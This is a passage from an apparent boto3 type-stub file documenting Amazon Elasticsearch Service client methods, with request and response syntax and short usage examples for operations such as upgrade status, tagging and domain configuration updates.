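client = boto3.client('es')
response = client.get_upgrade_history(DomainName='my-domain')
for history in response['UpgradeHistories']:
    print(history['UpgradeName'], history['UpgradeStatus'])
    # Drill into the individual steps of each upgrade
    for step in history['StepsList']:
        print('  ', step['UpgradeStep'], step['UpgradeStepStatus'])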
"""
pass
def get_upgrade_status(self, DomainName: str) -> Dict:
"""
Retrieves the latest status of the last upgrade or upgrade eligibility check that was performed on the domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/GetUpgradeStatus>`_
**Request Syntax**
::
response = client.get_upgrade_status(
DomainName='string'
)
**Response Syntax**
::
{
'UpgradeStep': 'PRE_UPGRADE_CHECK'|'SNAPSHOT'|'UPGRADE',
'StepStatus': 'IN_PROGRESS'|'SUCCEEDED'|'SUCCEEDED_WITH_ISSUES'|'FAILED',
'UpgradeName': 'string'
}
**Response Structure**
- *(dict) --*
Container for response returned by `` GetUpgradeStatus `` operation.
- **UpgradeStep** *(string) --*
Represents one of 3 steps that an Upgrade or Upgrade Eligibility Check goes through:
* PreUpgradeCheck
* Snapshot
* Upgrade
- **StepStatus** *(string) --*
One of 4 statuses that a step can go through, returned as part of the `` GetUpgradeStatusResponse `` object. The status can take one of the following values:
* In Progress
* Succeeded
* Succeeded with Issues
* Failed
- **UpgradeName** *(string) --*
A string that describes the update briefly.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:rtype: dict
:returns:
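**Example**
A minimal usage sketch; ``my-domain`` is a hypothetical placeholder:
::
import boto3
client = boto3.client('es')
status = client.get_upgrade_status(DomainName='my-domain')
# Shows which step the last upgrade reached and how it fared
print(status['UpgradeStep'], status['StepStatus'])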
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_domain_names(self) -> Dict:
"""
Returns the names of all Elasticsearch domains owned by the current user's account.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListDomainNames>`_
**Request Syntax**
::
response = client.list_domain_names()
**Response Syntax**
::
{
'DomainNames': [
{
'DomainName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``ListDomainNames`` operation. Contains the names of all Elasticsearch domains owned by this account.
- **DomainNames** *(list) --*
List of Elasticsearch domain names.
- *(dict) --*
- **DomainName** *(string) --*
Specifies the ``DomainName`` .
:rtype: dict
:returns:
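**Example**
A minimal usage sketch:
::
import boto3
client = boto3.client('es')
# Collect just the domain name strings from the response
names = [d['DomainName'] for d in client.list_domain_names()['DomainNames']]
print(names)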
"""
pass
def list_elasticsearch_instance_types(self, ElasticsearchVersion: str, DomainName: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists all Elasticsearch instance types that are supported for the given ElasticsearchVersion.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListElasticsearchInstanceTypes>`_
**Request Syntax**
::
response = client.list_elasticsearch_instance_types(
ElasticsearchVersion='string',
DomainName='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ElasticsearchInstanceTypes': [
'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for the parameters returned by `` ListElasticsearchInstanceTypes `` operation.
- **ElasticsearchInstanceTypes** *(list) --*
List of instance types supported by Amazon Elasticsearch Service for the given `` ElasticsearchVersion `` .
- *(string) --*
- **NextToken** *(string) --*
If more results are available, NextToken is present; make a further request to the same API with the received NextToken to paginate the remaining results.
:type ElasticsearchVersion: string
:param ElasticsearchVersion: **[REQUIRED]**
Version of Elasticsearch for which the list of supported instance types is needed.
:type DomainName: string
:param DomainName:
DomainName represents the name of the domain that you are trying to modify. This should be present only if you are querying for the list of available Elasticsearch instance types when modifying an existing domain.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. The value provided must be greater than 30, or it won't be honored.
:type NextToken: string
:param NextToken:
NextToken should be sent if an earlier API call produced a result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
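**Example**
A minimal usage sketch for one Elasticsearch version; the version string ``'6.3'`` is an illustrative value:
::
import boto3
client = boto3.client('es')
response = client.list_elasticsearch_instance_types(ElasticsearchVersion='6.3')
print(response['ElasticsearchInstanceTypes'])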
"""
pass
def list_elasticsearch_versions(self, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists all supported Elasticsearch versions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListElasticsearchVersions>`_
**Request Syntax**
::
response = client.list_elasticsearch_versions(
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ElasticsearchVersions': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for the response parameters received from the `` ListElasticsearchVersions `` operation.
- **ElasticsearchVersions** *(list) --*
List of supported Elasticsearch versions.
- *(string) --*
- **NextToken** *(string) --*
Paginated APIs accept a NextToken input to return results for the next page, and provide a NextToken output in the response, which the client can use to retrieve more results.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. The value provided must be greater than 10, or it won't be honored.
:type NextToken: string
:param NextToken:
Paginated APIs accept a NextToken input to return results for the next page, and provide a NextToken output in the response, which the client can use to retrieve more results.
:rtype: dict
:returns:
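**Example**
A minimal usage sketch:
::
import boto3
client = boto3.client('es')
# Prints the version strings the service currently supports
print(client.list_elasticsearch_versions()['ElasticsearchVersions'])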
"""
pass
def list_tags(self, ARN: str) -> Dict:
"""
Returns all tags for the given Elasticsearch domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListTags>`_
**Request Syntax**
::
response = client.list_tags(
ARN='string'
)
**Response Syntax**
::
{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``ListTags`` operation. Contains tags for all requested Elasticsearch domains.
- **TagList** *(list) --*
List of ``Tag`` for the requested Elasticsearch domain.
- *(dict) --*
Specifies a key value pair for a resource tag.
- **Key** *(string) --*
Specifies the ``TagKey`` , the name of the tag. Tag keys must be unique for the Elasticsearch domain to which they are attached.
- **Value** *(string) --*
Specifies the ``TagValue`` , the value assigned to the corresponding tag key. Tag values can be null and do not have to be unique in a tag set. For example, you can have a key value pair in a tag set of ``project : Trinity`` and ``cost-center : Trinity``
:type ARN: string
:param ARN: **[REQUIRED]**
Specify the ``ARN`` for the Elasticsearch domain to which the tags are attached that you want to view.
:rtype: dict
:returns:
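**Example**
A minimal usage sketch; the ARN is a hypothetical placeholder:
::
import boto3
client = boto3.client('es')
response = client.list_tags(ARN='arn:aws:es:us-east-1:123456789012:domain/my-domain')
for tag in response['TagList']:
    print(tag['Key'], '=', tag['Value'])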
"""
pass
def purchase_reserved_elasticsearch_instance_offering(self, ReservedElasticsearchInstanceOfferingId: str, ReservationName: str, InstanceCount: int = None) -> Dict:
"""
Allows you to purchase reserved Elasticsearch instances.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/PurchaseReservedElasticsearchInstanceOffering>`_
**Request Syntax**
::
response = client.purchase_reserved_elasticsearch_instance_offering(
ReservedElasticsearchInstanceOfferingId='string',
ReservationName='string',
InstanceCount=123
)
**Response Syntax**
::
{
'ReservedElasticsearchInstanceId': 'string',
'ReservationName': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a ``PurchaseReservedElasticsearchInstanceOffering`` operation.
- **ReservedElasticsearchInstanceId** *(string) --*
Details of the reserved Elasticsearch instance which was purchased.
- **ReservationName** *(string) --*
The customer-specified identifier used to track this reservation.
:type ReservedElasticsearchInstanceOfferingId: string
:param ReservedElasticsearchInstanceOfferingId: **[REQUIRED]**
The ID of the reserved Elasticsearch instance offering to purchase.
:type ReservationName: string
:param ReservationName: **[REQUIRED]**
A customer-specified identifier to track this reservation.
:type InstanceCount: integer
:param InstanceCount:
The number of Elasticsearch instances to reserve.
:rtype: dict
:returns:
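**Example**
A minimal sketch; note that this call incurs charges. The offering ID is a hypothetical placeholder, typically obtained from ``describe_reserved_elasticsearch_instance_offerings``:
::
import boto3
client = boto3.client('es')
response = client.purchase_reserved_elasticsearch_instance_offering(
    ReservedElasticsearchInstanceOfferingId='example-offering-id',
    ReservationName='my-reservation',
    InstanceCount=1)
print(response['ReservedElasticsearchInstanceId'])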
"""
pass
def remove_tags(self, ARN: str, TagKeys: List):
"""
Removes the specified set of tags from the specified Elasticsearch domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/RemoveTags>`_
**Request Syntax**
::
response = client.remove_tags(
ARN='string',
TagKeys=[
'string',
]
)
:type ARN: string
:param ARN: **[REQUIRED]**
Specifies the ``ARN`` for the Elasticsearch domain from which you want to delete the specified tags.
:type TagKeys: list
:param TagKeys: **[REQUIRED]**
Specifies the ``TagKey`` list which you want to remove from the Elasticsearch domain.
- *(string) --*
:returns: None
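**Example**
A minimal usage sketch; the ARN and tag key are hypothetical placeholders:
::
import boto3
client = boto3.client('es')
# Removes the 'project' tag from the domain; returns nothing on success
client.remove_tags(
    ARN='arn:aws:es:us-east-1:123456789012:domain/my-domain',
    TagKeys=['project'])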
"""
pass
def start_elasticsearch_service_software_update(self, DomainName: str) -> Dict:
"""
Schedules a service software update for an Amazon ES domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/StartElasticsearchServiceSoftwareUpdate>`_
**Request Syntax**
::
response = client.start_elasticsearch_service_software_update(
DomainName='string'
)
**Response Syntax**
::
{
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
The result of a ``StartElasticsearchServiceSoftwareUpdate`` operation. Contains the status of the update.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch service software update.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version update.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the domain that you want to update to the latest service software.
:rtype: dict
:returns:
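**Example**
A minimal usage sketch; ``my-domain`` is a hypothetical placeholder:
::
import boto3
client = boto3.client('es')
response = client.start_elasticsearch_service_software_update(DomainName='my-domain')
# Inspect the status of the scheduled update
print(response['ServiceSoftwareOptions']['UpdateStatus'])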
"""
pass
def update_elasticsearch_domain_config(self, DomainName: str, ElasticsearchClusterConfig: Dict = None, EBSOptions: Dict = None, SnapshotOptions: Dict = None, VPCOptions: Dict = None, CognitoOptions: Dict = None, AdvancedOptions: Dict = None, AccessPolicies: str = None, LogPublishingOptions: Dict = None) -> Dict:
"""
Modifies the cluster configuration of the specified Elasticsearch domain, such as setting the instance type and the number of instances.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/UpdateElasticsearchDomainConfig>`_
**Request Syntax**
::
response = client.update_elasticsearch_domain_config(
DomainName='string',
ElasticsearchClusterConfig={
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
EBSOptions={
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
SnapshotOptions={
'AutomatedSnapshotStartHour': 123
},
VPCOptions={
'SubnetIds': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
CognitoOptions={
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
AdvancedOptions={
'string': 'string'
},
AccessPolicies='string',
LogPublishingOptions={
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
}
)
**Response Syntax**
::
{
'DomainConfig': {
'ElasticsearchVersion': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'ElasticsearchClusterConfig': {
'Options': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EBSOptions': {
'Options': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AccessPolicies': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'SnapshotOptions': {
'Options': {
'AutomatedSnapshotStartHour': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'VPCOptions': {
'Options': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'CognitoOptions': {
'Options': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EncryptionAtRestOptions': {
'Options': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'NodeToNodeEncryptionOptions': {
'Options': {
'Enabled': True|False
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AdvancedOptions': {
'Options': {
'string': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'LogPublishingOptions': {
'Options': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
The result of an ``UpdateElasticsearchDomain`` request. Contains the status of the Elasticsearch domain being updated.
- **DomainConfig** *(dict) --*
The status of the updated Elasticsearch domain.
- **ElasticsearchVersion** *(dict) --*
String of format X.Y that specifies the version of the Elasticsearch domain.
- **Options** *(string) --*
Specifies the Elasticsearch version for the specified Elasticsearch domain.
- **Status** *(dict) --*
Specifies the status of the Elasticsearch version options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **ElasticsearchClusterConfig** *(dict) --*
Specifies the ``ElasticsearchClusterConfig`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the cluster configuration for the specified Elasticsearch domain.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **Status** *(dict) --*
Specifies the status of the configuration for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EBSOptions** *(dict) --*
Specifies the ``EBSOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the EBS options for the specified Elasticsearch domain.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **Status** *(dict) --*
Specifies the status of the EBS options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AccessPolicies** *(dict) --*
IAM access policy as a JSON-formatted string.
- **Options** *(string) --*
The access policy configured for the Elasticsearch domain. Access policies may be resource-based, IP-based, or IAM-based. See `Configuring Access Policies <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-access-policies>`__ for more information.
- **Status** *(dict) --*
The status of the access policy for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **SnapshotOptions** *(dict) --*
Specifies the ``SnapshotOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the daily snapshot options specified for the Elasticsearch domain.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **Status** *(dict) --*
Specifies the status of a daily automated snapshot.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **Options** *(dict) --*
Specifies the VPC options for the specified Elasticsearch domain.
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
- **Status** *(dict) --*
Specifies the status of the VPC options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Options** *(dict) --*
Specifies the Cognito options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
